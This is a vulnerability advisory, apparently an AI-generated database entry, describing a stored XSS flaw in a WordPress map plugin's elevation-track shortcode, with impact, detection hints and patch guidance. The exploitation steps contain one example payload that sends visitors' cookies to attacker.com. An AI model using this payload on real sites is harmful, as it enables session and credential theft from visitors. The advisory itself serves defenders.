
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-5451 is a Stored Cross-Site Scripting (XSS) vulnerability in the Extensions for Leaflet Map plugin for WordPress, affecting all versions up to and including 4.14. The flaw exists in the elevation-track shortcode due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on April 8, 2026, and carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The root cause is insufficient sanitization of user-supplied attributes passed to the elevation-track shortcode, combined with a lack of proper output escaping before rendering in the browser. Specifically, the vulnerable code paths are found in php/multielevation.php (line 227) and php/functions.php (line 168) in version 4.11 of the plugin. An authenticated attacker with at minimum Contributor-level access can embed a malicious script payload within the shortcode attributes in a post or page, which is then stored and executed in the browser of any user who subsequently visits that page (GitHub Advisory, Wordfence).
Successful exploitation allows authenticated attackers to persistently inject arbitrary JavaScript into WordPress pages, which executes in the context of any visitor's browser. This can lead to session token theft, credential harvesting, user redirection to malicious sites, defacement of page content, or delivery of further malware payloads. While availability is not directly impacted, the confidentiality and integrity of user sessions and page content are at risk for all visitors of affected pages (GitHub Advisory, Wordfence).
There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation at this time (Wordfence). The EPSS score is approximately 0.036–0.046%, placing it in the 15th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (GitHub Advisory).
/wp-content/plugins/extensions-leaflet-map/readme.txt) or by observing Leaflet map elements on public pages.[elevation-track] shortcode can be used.elevation-track shortcode with a crafted attribute containing a JavaScript payload, for example: [elevation-track attribute=""><script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or the REST API from Contributor-level accounts inserting elevation-track shortcodes with unusual attribute values containing HTML tags or JavaScript.wp_posts table entries containing [elevation-track shortcodes with embedded <script> tags, event handlers (e.g., onerror, onload), or encoded JavaScript payloads in post content.elevation-track shortcode, potentially indicating script-based data exfiltration.php/multielevation.php and php/functions.php for unauthorized modifications (GitHub Advisory).The vulnerability is patched in version 4.15 of the Extensions for Leaflet Map plugin, which includes fixes in php/multielevation.php and php/functions.php. Site administrators should update to version 4.15 or later immediately via the WordPress plugin dashboard. As interim mitigations: restrict Contributor-level access to only trusted users, audit all existing posts and pages using the elevation-track shortcode for suspicious content, and consider deploying a Web Application Firewall (WAF) with XSS detection rules. Disabling the plugin until the update is applied is also a viable precautionary measure (GitHub Advisory, WordPress Plugin).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."